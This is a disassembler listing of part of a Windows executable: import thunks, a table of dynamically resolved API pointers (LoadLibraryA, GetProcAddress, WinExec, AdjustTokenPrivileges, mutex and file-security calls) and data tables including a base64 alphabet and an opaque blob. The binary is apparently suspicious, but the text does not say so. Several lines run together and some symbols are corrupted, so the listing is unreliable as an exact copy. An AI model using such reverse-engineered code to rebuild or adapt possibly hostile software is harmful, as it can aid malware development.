; ---------------------------------------------------------------------------
jmp ds:dword_44F0CC
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4459F0 proc near ; CODE XREF: sub_43A25C+4E�p
; sub_43A25C+87�p
jmp ds:dword_44F0D0
sub_4459F0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4459FC proc near ; CODE XREF: .text:0043A186�p
jmp ds:dword_44F0D4
sub_4459FC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_445A08 proc near ; CODE XREF: sub_43A1C3+71�p
; sub_43A1C3+86�p
jmp ds:dword_44F0D8
sub_445A08 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_445A14 proc near ; CODE XREF: sub_43A25C+9E�p
jmp ds:dword_44F0DC
sub_445A14 endp
; ---------------------------------------------------------------------------
align 10h
_text ends
; Section 5. (virtual address 00046000)
; Virtual size : 00006DB8 ( 28088.)
; Section size in file : 00006DB8 ( 28088.)
; Offset to raw data for section: 00046000
; Flags C0000080: Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_bss segment para public 'BSS' use32
assume cs:_bss
;org 446000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_446000 dd 7C809A09h ; resolved to->KERNEL32.lstrlenW ; sub_443DD5+130�w
dword_446004 dd 7E41BC7Dh ; resolved to->USER32.GetWindow ; sub_43BB7B+15�r ...
dword_446008 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_43EB7A+4AA�r ...
dword_44600C dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; sub_443DD5+168�w
dword_446010 dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrement ; sub_440C87+1E�r ...
dword_446014 dd 7E42F383h ; resolved to->USER32.SendMessageA ; sub_43BE21+7A0�r ...
dword_446018 dd 0 ; sub_4425A6+190�r
dword_44601C dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_4428E6+186�r
dword_446020 dd 76C69496h ; sub_4433F9+1A6�r
dword_446024 dd 73D9E65Ch ; sub_43B638+6A�r ...
dword_446028 dd 0 ; sub_43A8A3+192�r ...
dword_44602C dd 7C80180Eh ; resolved to->KERNEL32.ReadFile ; sub_43EB7A+86�r ...
dword_446030 dd 7C90311Bh ; resolved to->NTDLL.RtlZeroMemory ; sub_443DD5+280�w
dword_446034 dd 73D9ADFAh ; sub_43D16C+14E�r ...
dword_446038 dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameA ; sub_443DD5+558�w
dword_44603C dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_446040 dd 77124980h ; sub_43CEF8+34�r ...
dword_446044 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA ; sub_444702+3E�r
dword_446048 dd 77DF986Bh ; resolved to->ADVAPI32.GetSidSubAuthorityCount align 10h
dword_446050 dd 0 ; sub_43E8B9+9D�r ...
dd 3E7h dup(0)
dword_446FF0 dd 7E41DBECh ; resolved to->USER32.MoveWindowdword_446FF4 dd 77DD778Eh ; resolved to->ADVAPI32.InitializeSecurityDescriptor ; sub_4428E6+148�r
dword_446FF8 dd 77124C05h ; sub_43BC02+1DD�r ...
dword_446FFC dd 7E42D1D1h ; resolved to->USER32.EnumDesktopWindows ; sub_43AFA1+309�w
dword_447000 dd 0 ; sub_43E524+CC�w
dword_447004 dd 7E4196B8h ; resolved to->USER32.DispatchMessageA ; sub_43AFA1+BA�w
dword_447008 dd 73D9BBAAh ; sub_43EB7A+39A�r ...
align 10h
dword_447010 dd 0 ; sub_43E8B9+200�r ...
dd 3E7h dup(0)
dword_447FB0 dd 7C80AC0Fh ; resolved to->KERNEL32.SetErrorMode ; sub_443DD5+344�w
dword_447FB4 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileA ; sub_43D16C+2D1�r ...
dword_447FB8 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSection ; sub_4421FA+36D�w ...
dword_447FBC dd 7C837A77h ; resolved to->KERNEL32.Beepdword_447FC0 dd 7E42F420h ; resolved to->USER32.GetClassNameA ; sub_43BB7B+32�r
align 10h
dword_447FD0 dd 40h dup(0) ; sub_43F19E+6D�o ...
dword_4480D0 dd 77F161D1h ; resolved to->GDI32.GetStockObject ; sub_43AD9A+69�w
align 10h
dword_4480E0 dd 0 ; sub_43E8B9+1D1�r ...
dd 3E7h dup(0)
dword_449080 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessToken ; sub_4428E6+46�r
dword_449084 dd 77502A37h ; sub_444E43+82�w
dword_449088 dd 7C8302EDh ; resolved to->KERNEL32.GetDiskFreeSpaceA ; sub_443DD5+360�w
dword_44908C dd 774FEE36h dword_449090 dd 7E420A36h ; resolved to->USER32.RegisterClassA ; sub_43AFA1+20A�w
dword_449094 dd 7C86136Dh ; resolved to->KERNEL32.WinExec ; sub_443DD5+14C�w
align 10h
dword_4490A0 dd 41h dup(0) ; sub_43E36B+13�o ...
dword_4491A4 dd 73D9E660h ; sub_43F4CC+83E�r ...
dword_4491A8 dd 77DFD4B0h ; resolved to->ADVAPI32.GetSidIdentifierAuthoritydword_4491AC dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_43AD9A+63�r ...
byte_4491B0 db 0 ; DATA XREF: sub_43E8B9+15C�r
; sub_43E8B9+216�r ...
align 4
dd 0F9h dup(0)
dword_449598 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_43AD9A+D�r ...
dword_44959C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_444702+1D�r
dword_4495A0 dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameA ; sub_4409DF+31�r
dword_4495A4 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_4495A8 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_443DD5+4B0�w
dword_4495AC dd 7E41D60Dh ; resolved to->USER32.SetWindowLongA ; sub_43BE21+EFE�r ...
dword_4495B0 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_443DD5+3EC�w
dword_4495B4 dd 76C69828h ; sub_4433F9+17B�r
dword_4495B8 dd 0 ; sub_440C87+19�o ...
dword_4495BC dd 7C80EDD7h ; resolved to->KERNEL32.FindClose ; sub_43D16C+2F2�r ...
dword_4495C0 dd 80144h dword_4495C4 dd 0FC00h ; sub_4433F9:loc_4435A5�r
dword_4495C8 dd 7E41D4EEh ; resolved to->USER32.DefWindowProcA ; sub_4446E4+13�r
dword_4495CC dd 7C80992Fh ; resolved to->KERNEL32.LocalFree ; sub_43E36B+1AC�r ...
dword_4495D0 dd 0 ; sub_43E524+1E0�w ...
dword_4495D4 dd 774FFAC3h ; sub_444E43+66�w
align 10h
dword_4495E0 dd 0 ; sub_43E040+D1�w ...
dd 0FEh dup(0)
dword_4499DC dd 77DF9839h ; resolved to->ADVAPI32.GetSidSubAuthoritydword_4499E0 dd 73D9C489h dword_4499E4 dd 0 dword_4499E8 dd 77DFCE26h ; resolved to->ADVAPI32.SetSecurityDescriptorOwner ; sub_4428E6+173�r
dword_4499EC dd 7C80998Dh ; resolved to->KERNEL32.LocalAlloc ; sub_441F97+CA�r ...
dword_4499F0 dd 73D9C4C5h dword_4499F4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_443CBA+8�r ...
dword_4499F8 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessId ; sub_443DD5+4E8�w
dword_4499FC dd 7E41DA60h ; resolved to->USER32.SetFocus ; sub_43BE21+1008�r ...
dword_449A00 dd 7CA268D5h ; resolved to->SHELL32.SHGetFolderPathA ; sub_43AB3B+28�r ...
align 10h
word_449A10 dw 0 ; DATA XREF: sub_43E8B9:loc_43E9F9�r
; sub_43E8B9:loc_43EA3C�r ...
align 4
dd 1F3h dup(0)
dword_44A1E0 dd 77DD77B3h ; resolved to->ADVAPI32.SetSecurityDescriptorDacl ; sub_4428E6+15C�r
dword_44A1E4 dd 7E41EF69h ; resolved to->USER32.LoadCursorA ; sub_43AFA1+19A�w
dword_44A1E8 dd 7E41DAEAh ; resolved to->USER32.DestroyWindow ; sub_43D8EA+53F�r
dword_44A1EC dd 0 ; sub_43E524+108�w
dword_44A1F0 dd 5 dup(0) ; sub_43E524+F8�o ...
dword_44A204 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_44A208 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_43AFA1+28�r ...
dword_44A20C dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_443DD5+1F4�w
dword_44A210 dd 73DA018Fh dword_44A214 dd 77F3B730h ; resolved to->GDI32.CreateFontA ; sub_43BE21+789�r ...
dword_44A218 dd 77164D9Ah ; sub_43CEF8+5E�r ...
dword_44A21C dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileA ; sub_43D16C+265�r ...
dword_44A220 dd 80h dup(0) ; sub_440FDF+25�o ...
dword_44A420 dd 7C80176Bh ; resolved to->KERNEL32.GetSystemTime ; sub_43AB3B+32�r ...
align 10h
dword_44A430 dd 41h dup(0) ; sub_43E524+B0�o ...
dword_44A534 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_443DD5+37C�w
align 10h
dword_44A540 dd 0 ; sub_43BE21+7B�r ...
dword_44A544 dd 0 ; sub_43BE21+4B5�r ...
dword_44A548 dd 0 ; sub_43BE21+61B�r ...
dword_44A54C dd 0 ; sub_43BE21+8FE�r ...
dword_44A550 dd 0 ; sub_43BE21+BA9�r ...
dword_44A554 dd 0 ; sub_43BE21+C0F�r ...
dword_44A558 dd 0 ; sub_43BE21+D12�r ...
dword_44A55C dd 0 ; sub_43BE21+EA7�r ...
dword_44A560 dd 0 ; sub_43D8EA+5B9�r
dword_44A564 dd 0 ; sub_43D8EA+5F0�r
dword_44A568 dd 0 ; sub_43D8EA+624�r
dword_44A56C dd 0 ; sub_43D8EA+658�r
dd 4A4h dup(0)
dword_44B800 dd 7E42E002h ; resolved to->USER32.GetMessageA ; sub_43AFA1+10E�w
dword_44B804 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFree ; sub_443DD5+210�w
dword_44B808 dd 73D9D340h ; sub_43F4CC+1D�r ...
dword_44B80C dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_44B810 dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_4428E6+1C6�r
dword_44B814 dd 0 ; sub_4425A6+17E�r
dword_44B818 dd 73D9D5E0h ; sub_43F4CC+CB1�r ...
dword_44B81C dd 7C80EA1Bh ; resolved to->KERNEL32.OpenMutexA ; sub_443DD5+3B4�w
dword_44B820 dd 7E41FF33h ; resolved to->USER32.CreateWindowExA ; sub_43AFA1+66�w ...
dword_44B824 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_4421FA+385�w ...
dword_44B828 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsA ; sub_443DD5+520�w
dword_44B82C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_43E040+8F�r ...
dword_44B830 dd 0 ; sub_4435CB+481�r ...
dd 3E7h dup(0)
dword_44C7D0 dd 73D9DBA2h dword_44C7D4 dd 7E418C2Eh ; resolved to->USER32.SetTimerdword_44C7D8 dd 0 dword_44C7DC dd 7E41F642h ; resolved to->USER32.CallWindowProcA ; sub_43D8EA+5C0�r ...
off_44C7E0 dd offset byte_41A00D ; DATA XREF: sub_43A39F+25C�w
; sub_4433F9+1B2�r
dword_44C7E4 dd 7C821BA5h ; resolved to->KERNEL32.GetVolumeInformationA ; sub_43F294+DF�r ...
dword_44C7E8 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_444702+49�r
dword_44C7EC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexA ; sub_43A39F+124�r ...
dword_44C7F0 dd 77DD7B76h ; resolved to->ADVAPI32.GetTokenInformation ; sub_4428E6+95�r ...
dword_44C7F4 dd 7E4208CEh ; resolved to->USER32.LoadIconA ; sub_43AFA1+1B6�w
dword_44C7F8 dd 7C810A77h ; resolved to->KERNEL32.GetFileSize ; sub_44285A+46�r ...
dword_44C7FC dd 7E41945Dh ; resolved to->USER32.GetWindowLongA ; sub_43BE21+ED0�r ...
dword_44C800 dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; sub_443DD5+53C�w
dword_44C804 dd 0 ; sub_441138+D3F�r
dword_44C808 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_443DD5+57A�w
dword_44C80C dd 73D92B86h ; sub_43AD58+17�r ...
dword_44C810 dd 73D9E5C5h ; sub_43A39F+110�r ...
dword_44C814 dd 7E43210Ah ; resolved to->USER32.FindWindowExA ; sub_43BE21+443�r ...
dword_44C818 dd 0 ; sub_43A39F+29E�w ...
dword_44C81C dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_443DD5+184�w
dword_44C820 dd 7E45058Ah ; resolved to->USER32.MessageBoxA ; sub_43D8EA+1E1�r ...
dword_44C824 dd 775784ADh ; sub_43A324+32�r ...
dword_44C828 dd 73D9D320h ; sub_442ADD+D6�w
dword_44C82C dd 7C821435h ; resolved to->KERNEL32.GetExitCodeThread ; sub_443DD5+328�w
dword_44C830 dd 7E41B6D4h ; resolved to->USER32.GetWindowRect ; sub_43BE21+4CF�r
dword_44C834 dd 7E42F52Bh ; resolved to->USER32.SetWindowTextA ; sub_43D8EA+4DA�r
dword_44C838 dd 7E41D8A4h ; resolved to->USER32.ShowWindow ; sub_43BE21+4BC�r ...
dword_44C83C dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_4421FA+355�w ...
dword_44C840 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_43A39F+139�r ...
dword_44C844 dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeA ; sub_43E040+A1�r ...
dword_44C848 dd 77E0D2FDh ; resolved to->ADVAPI32.SetFileSecurityA ; sub_43B347+2D�r ...
align 10h
dword_44C850 dd 40h dup(0) ; sub_43E524+291�o ...
dword_44C950 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_4435CB:loc_443A1B�r ...
dword_44C954 dd 0 ; sub_43E524+D7�w
dword_44C958 dd 7C80E7ECh ; resolved to->KERNEL32.FileTimeToSystemTime ; sub_43D4AD+106�r ...
dword_44C95C dd 7E418BF6h ; resolved to->USER32.TranslateMessage ; sub_43AFA1+2CE�w
dword_44C960 dd 7C810AD9h ; resolved to->KERNEL32.CompareFileTime ; sub_43D4AD+BC�r ...
dword_44C964 dd 0 ; sub_43B31E+15�o ...
dword_44C968 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_43EB7A+47�r ...
align 10h
dword_44C970 dd 0 ; sub_43E040+59�r ...
dd 0FEh dup(0)
dword_44CD6C dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_43EB7A+461�r ...
dword_44CD70 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_43E040+173�r ...
align 8
dword_44CD78 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_43F294+23�r ...
dword_44CD7C dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_443DD5+4CC�w
dword_44CD80 dd 7C810B8Eh ; resolved to->KERNEL32.SetFilePointer ; sub_43E1E8+AA�r ...
dword_44CD84 dd 77124880h ; sub_43BC02+20E�r ...
dword_44CD88 dd 7E43212Bh ; resolved to->USER32.GetWindowTextA ; sub_43AFA1+17E�w ...
dword_44CD8C dd 0 ; sub_4421CD+19�o ...
dword_44CD90 dd 73D9DBAFh ; sub_43F4CC+948�r ...
dword_44CD94 dd 77124920h ; sub_4435CB+691�r
dword_44CD98 dd 7750CB9Ch align 10h
dword_44CDA0 dd 7C97C660h, 0FFFFFFFFh, 4 dup(0) ; sub_43AC82+58�o ...
_bss ends
; Section 6. (virtual address 0004D000)
; Virtual size : 00001E00 ( 7680.)
; Section size in file : 00001E00 ( 7680.)
; Offset to raw data for section: 0004D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 44D000h
off_44D000 dd offset sub_445914 ; DATA XREF: .text:0043A1B5�r
dword_44D004 dd 0 ; sub_43A1C3+64�r
dword_44D008 dd 0 dword_44D00C dd 0 ; sub_43A1C3:loc_43A23C�r
dword_44D010 dd 0 align 8
dd 7325h
aWr: ; DATA XREF: sub_43A1C3+3D�o
; sub_43A1C3+4F�o ...
unicode 0, <wr>,0
align 4
dd 4 dup(0)
dword_44D034 dd 0 dword_44D038 dd 0 ; .text:0043A117�r ...
dword_44D03C dd 0 dword_44D040 dd 14h dup(0) ; .text:0043A11F�o
word_44D090 dw 5 ; DATA XREF: sub_43D4AD+182�r
; sub_43F4CC+EAC�r ...
align 4
dword_44D094 dd 2 ; sub_43DF69+3F�r ...
word_44D098 dw 5 ; DATA XREF: sub_43A764+69�r
; sub_43AD58+A�r ...
align 4
dword_44D09C dd 1 ; sub_43AB3B+18�r ...
word_44D0A0 dw 1 ; DATA XREF: sub_43AE0A+87�r
; sub_43B638+20�r ...
align 4
dword_44D0A4 dd 9 ; sub_43A39F+27F�r ...
dword_44D0A8 dd 4 ; sub_43DF69+27�r ...
dword_44D0AC dd 5 ; sub_43BE21+816�r ...
dword_44D0B0 dd 9 ; sub_43BE21+7D3�r ...
word_44D0B4 dw 4 ; DATA XREF: sub_43A6D4+2E�r
; sub_43B947:loc_43B973�r ...
align 4
word_44D0B8 dw 9 ; DATA XREF: sub_43A39F+22D�r
; sub_43A764+C3�r ...
align 4
dword_44D0BC dd 2 ; sub_43E524+9A�r ...
dword_44D0C0 dd 4 ; sub_43F4CC+A1E�r ...
word_44D0C4 dw 9 ; DATA XREF: sub_43A8A3+BB�r
; sub_43AC82+B6�r ...
align 4
dword_44D0C8 dd 2 ; sub_43BB6D�r ...
dword_44D0CC dd 6 ; sub_43A39F+309�r ...
dword_44D0D0 dd 1 ; sub_43BE21+1AA�r ...
dword_44D0D4 dd 0 ; sub_43AB3B+8D�r ...
dword_44D0D8 dd 5 ; sub_43B73E+148�r ...
dword_44D0DC dd 0 ; sub_43BC02+10�r ...
dword_44D0E0 dd 2 ; sub_43BE21+770�r ...
word_44D0E4 dw 2 ; DATA XREF: sub_43A39F+313�r
; sub_43B947+A4�r ...
align 4
word_44D0E8 dw 4 ; DATA XREF: sub_43AB3B+4E�r
; sub_43BE21+CF1�r ...
align 4
dword_44D0EC dd 6 ; sub_43BE21+104�r ...
dword_44D0F0 dd 0 ; sub_43BE21+1D4�r ...
word_44D0F4 dw 7 ; DATA XREF: sub_43AD58+1E�r
; sub_43BE21+201�r ...
align 4
word_44D0F8 dw 1 ; DATA XREF: sub_43BB7B+50�r
; sub_43BE21+2C3�r ...
align 4
dword_44D0FC dd 7 ; sub_43A8A3+141�r ...
dword_44D100 dd 7 ; sub_43AC82+A2�r ...
dword_44D104 dd 4 ; sub_43A764+D9�r ...
dword_44D108 dd 9 ; sub_43D8EA+46F�r ...
dword_44D10C dd 0 ; sub_43BE21+941�r ...
word_44D110 dw 0 ; DATA XREF: sub_43AB3B+F8�r
; sub_43BE21+9C2�r ...
align 4
word_44D114 dw 9 ; DATA XREF: sub_43A39F+20B�r
; sub_43BE21+17E�r ...
align 4
dword_44D118 dd 6 ; sub_43BC02:loc_43BCF7�r ...
word_44D11C dw 4 ; DATA XREF: sub_43CEF8+CB�r
; sub_43D8EA+3AC�r ...
align 10h
word_44D120 dw 9 ; DATA XREF: sub_43AB3B+EA�r
; sub_43AE0A+1A�r ...
align 4
dword_44D124 dd 2 ; sub_43B73E+11A�r ...
word_44D128 dw 5 ; DATA XREF: sub_43BE21:loc_43C0CF�r
; sub_43BE21+A48�r ...
align 4
word_44D12C dw 8 ; DATA XREF: sub_43B947+6A�r
; sub_43D4AD+C8�r ...
align 10h
word_44D130 dw 2 ; DATA XREF: sub_43BE21+752�r
; sub_43BE21+C2A�r ...
align 4
dword_44D134 dd 4 ; sub_43F09C+E9�r ...
dword_44D138 dd 5 ; sub_43BE21:loc_43BEAA�r ...
dword_44D13C dd 8 ; sub_43E040+FF�r ...
dword_44D140 dd 9 ; sub_43E040+147�r ...
word_44D144 dw 9 ; DATA XREF: sub_43B947:loc_43B9FF�r
; sub_43BE21+905�r ...
align 4
word_44D148 dw 0 ; DATA XREF: sub_43A764+4A�r
; sub_43AB3B+69�r ...
align 4
dword_44D14C dd 8 ; sub_43A39F:loc_43A6A3�r ...
dword_44D150 dd 2 ; sub_43CEF8+19D�r ...
dword_44D154 dd 3 ; sub_43D16C+110�r ...
dword_44D158 dd 8 ; sub_43A39F+1FB�r ...
dword_44D15C dd 0 ; sub_43AB3B+E1�r ...
word_44D160 dw 6 ; DATA XREF: sub_43A39F+7F�r
; sub_43AC82+92�r ...
align 4
word_44D164 dw 4 ; DATA XREF: sub_43D8EA+1AE�r
; sub_43F4CC+1304�r ...
align 4
dword_44D168 dd 9 ; sub_43B947+15D�r ...
dword_44D16C dd 2 ; sub_43CEF8+1C2�r ...
dword_44D170 dd 5 ; sub_43BE21+1E6�r ...
dword_44D174 dd 2 ; sub_43E8B9+111�r ...
dword_44D178 dd 5 ; sub_43A6D4+49�r ...
dword_44D17C dd 9 ; sub_43B73E+95�r ...
word_44D180 dw 5 ; DATA XREF: sub_43A39F+1AE�r
; sub_43A8A3+179�r ...
align 4
dword_44D184 dd 1 ; sub_43AB3B+7E�r ...
dword_44D188 dd 9 ; sub_43B947+FD�r ...
dword_44D18C dd 1 ; sub_43BC02+1AB�r ...
word_44D190 dw 5 ; DATA XREF: sub_43A39F+2AA�r
; sub_43A764+B4�r ...
align 4
word_44D194 dw 9 ; DATA XREF: sub_43A8A3+10A�r
; sub_43A8A3+1A2�r ...
align 4
dword_44D198 dd 9 ; sub_43BC02+A2�r ...
dword_44D19C dd 9 ; sub_43BE21+1C1�r ...
dword_44D1A0 dd 0 ; sub_43BE21+138�r ...
dword_44D1A4 dd 1 ; sub_43BB7B+38�r ...
dword_44D1A8 dd 8 ; sub_43A764+18�r ...
dword_44D1AC dd 5 ; sub_43BE21+230�r ...
dword_44D1B0 dd 7 ; sub_43B947+125�r ...
dword_44D1B4 dd 4 ; sub_43B947+202�r ...
word_44D1B8 dw 5 ; DATA XREF: sub_43BE21+117�r
; sub_43BE21+E65�r ...
align 4
dword_44D1BC dd 3 ; sub_43BE21+1EE�r ...
word_44D1C0 dw 9 ; DATA XREF: sub_43A764+EB�r
; sub_43BE21+161�r ...
align 4
dword_44D1C4 dd 1 ; sub_43BE21+780�r ...
dword_44D1C8 dd 2 ; sub_43D4AD+176�r ...
dword_44D1CC dd 1 ; sub_43B896+3A�r ...
dword_44D1D0 dd 5 ; sub_43B2B1+27�r ...
dword_44D1D4 dd 5 ; sub_43F294+124�r ...
dword_44D1D8 dd 3 ; sub_43AC82+AE�r ...
word_44D1DC dw 9 ; DATA XREF: sub_43B896+27�r
; sub_43D7AB+74�r ...
align 10h
dword_44D1E0 dd 1 ; sub_43D7AB+101�r ...
dword_44D1E4 dd 1 ; sub_43AB3B+A2�r ...
dword_44D1E8 dd 7 ; sub_43AB3B+60�r ...
dword_44D1EC dd 6 ; sub_43B947+158�r ...
word_44D1F0 dw 2 ; DATA XREF: sub_43B31E+3�r
; sub_43CEF8+4A�r ...
align 4
dword_44D1F4 dd 3 ; sub_43D8EA+145�r ...
dword_44D1F8 dd 6 ; sub_43B73E+41�r ...
dword_44D1FC dd 4 ; sub_43BE21+762�r ...
dword_44D200 dd 6 ; sub_43BE21+76B�r ...
word_44D204 dw 6 ; DATA XREF: sub_43D7AB+124�r
; sub_43E2CF+39�r ...
align 4
dword_44D208 dd 6 ; sub_43D16C+A6�r ...
dword_44D20C dd 7 ; sub_43E8B9+231�r ...
word_44D210 dw 6 ; DATA XREF: sub_43AE0A+44�r
; sub_43BE21+843�r ...
align 4
dword_44D214 dd 1 ; sub_43BC02+17�r ...
dword_44D218 dd 9 ; sub_43B73E+F8�r ...
word_44D21C dw 6 ; DATA XREF: sub_43A8A3+77�r
; sub_43BE21+80F�r ...
align 10h
word_44D220 dw 7 ; DATA XREF: sub_43A764+9B�r
; sub_43B6DF+E�r ...
align 4
dword_44D224 dd 5 ; sub_43B947+8F�r ...
word_44D228 dw 4 ; DATA XREF: sub_43E040+18A�r
; sub_43F09C+CD�r ...
align 4
dword_44D22C dd 4 ; sub_43B947+9�r ...
dword_44D230 dd 7 ; sub_43E524+220�r ...
dword_44D234 dd 3 ; sub_4409DF:loc_440BDC�r ...
dword_44D238 dd 9 ; sub_43BE21+73E�r ...
word_44D23C dw 5 ; DATA XREF: sub_43B8E8+43�r
; sub_43E040+C7�r ...
align 10h
dword_44D240 dd 0 ; sub_43EB7A+42C�r ...
dword_44D244 dd 9 ; sub_43A8A3+165�r ...
dword_44D248 dd 0 ; sub_43BE21+ADC�r ...
dword_44D24C dd 9 ; sub_43A6D4+55�r ...
dword_44D250 dd 1 ; sub_43AC82+1E�w ...
dword_44D254 dd 7C800000h ; sub_4421FA+331�r ...
dword_44D258 dd 73D90000h ; sub_442ADD+2E�w ...
dword_44D25C dd 7E410000h ; sub_43AFA1+2E�w ...
dword_44D260 dd 77F10000h ; sub_43AD9A+2E�w ...
dword_44D264 dd 774E0000h ; sub_444E43+2E�w ...
dword_44D268 dd 77120000h ; sub_43CE34+2E�w ...
dword_44D26C dd 76BB0000h ; sub_4427FF+2E�w ...
dword_44D270 dd 76C60000h ; sub_441F34+2E�w ...
dword_44D274 dd 7C9C0000h ; sub_442C9D+2E�w ...
dword_44D278 dd 77DD0000h ; sub_43B3E1+2E�w ...
off_44D27C dd offset aAbcdefghijklmn ; DATA XREF: sub_43E2CF:loc_43E332�r
; "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm"...
dword_44D280 dd 1 ; sub_43AF59+37�w ...
dword_44D284 dd 4B9C20h ; sub_4428E6+103�w ...
dword_44D288 dd 471BB0h ; sub_43B347+24�r ...
dword_44D28C dd 0E860h, 0E9610000h, 2 dup(0)dword_44D29C dd 11h, 0Fh dup(0)dword_44D2DC dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
; DATA XREF: sub_43F082+3�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh
dword_44D31C dd 0 ; sub_43EB7A+3CE�w ...
off_44D320 dd offset sub_43B5BD ; DATA XREF: sub_4435CB+61D�o
dd offset sub_4443AD
dd offset sub_43B31E
dd offset sub_441084
dd offset sub_43BBFA
dd offset sub_444506
dd offset sub_43E8B9
dword_44D33C dd 0 ; sub_43CEF8+10�r ...
off_44D340 dd offset sub_43A324 ; DATA XREF: .data:off_44D35C�o
dd offset sub_443175
dd offset sub_4421CD
dd offset sub_4444FE
dd offset sub_4444F6
dd offset sub_444A1F
dd offset sub_43B6DF
off_44D35C dd offset off_44D340 ; DATA XREF: sub_43AE0A+C4�o
; sub_43B947+131�o
dword_44D360 dd 0 ; sub_43AE0A+73�r ...
off_44D364 dd offset sub_440C0C ; DATA XREF: .data:off_44D380�o
dd offset sub_443CBA
dd offset sub_440C87
dd offset sub_43AF51
dd offset sub_43E2C7
dd offset sub_43A75C
dd offset sub_43AE0A
off_44D380 dd offset off_44D364 ; DATA XREF: sub_43B947:loc_43BAFE�o
dword_44D384 dd 0FFFFFFFFh dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
off_44D784 dd offset loc_43B7AC ; DATA XREF: sub_43B73E+67�r
dd offset loc_43B7B4
dd offset loc_43B7F5
dd offset loc_43B830
aCreatethread db 'CreateThread',0 ; DATA XREF: sub_4421FA+2E3�o
aEntercriticals db 'EnterCriticalSection',0 ; DATA XREF: sub_4421FA+2F6�o
aInitializecrit db 'InitializeCriticalSection',0 ; DATA XREF: sub_4421FA+309�o
aLeavecriticals db 'LeaveCriticalSection',0 ; DATA XREF: sub_4421FA+31D�o
align 4
dword_44D7E8 dd 49E10000h, 75714573h, 55476C61h db 49h, 44h, 0
byte_44D7F7 db 0 ; DATA XREF: sub_444E43+87�o
dd 6F439200h, 6E696E55h, 61697469h, 657A696Ch
db 0
byte_44D809 db 2 dup(0), 37h ; DATA XREF: sub_444E43+6B�o
aCoinitialize db 'CoInitialize',0
